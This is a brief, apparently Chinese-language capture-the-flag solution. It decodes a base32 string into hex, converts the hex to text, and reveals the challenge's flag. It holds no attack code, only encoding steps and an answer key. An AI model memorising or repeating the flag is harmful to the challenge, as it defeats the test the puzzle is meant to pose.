GIYDMNRWIM3DCNRXG5BDGNJWGEZTMMZTGMYTGNZWGUZTSMSEGMZDMNBTHA3DMMSEGM2DMMZTGAZTKMSEGM3TMNJTGE3DEMSEGM4DGNRTGMZTSMZQGM2DGMRTG4ZTCNRTGM2TMNBXIQ======

再解base32

20666C61677B35613633313765392D326438662D346330352D376531622D3836333930343237316335647D

然后再转化为字符串

得到flag

flag{5a6317e9-2d8f-4c05-7e1b-863904271c5d}
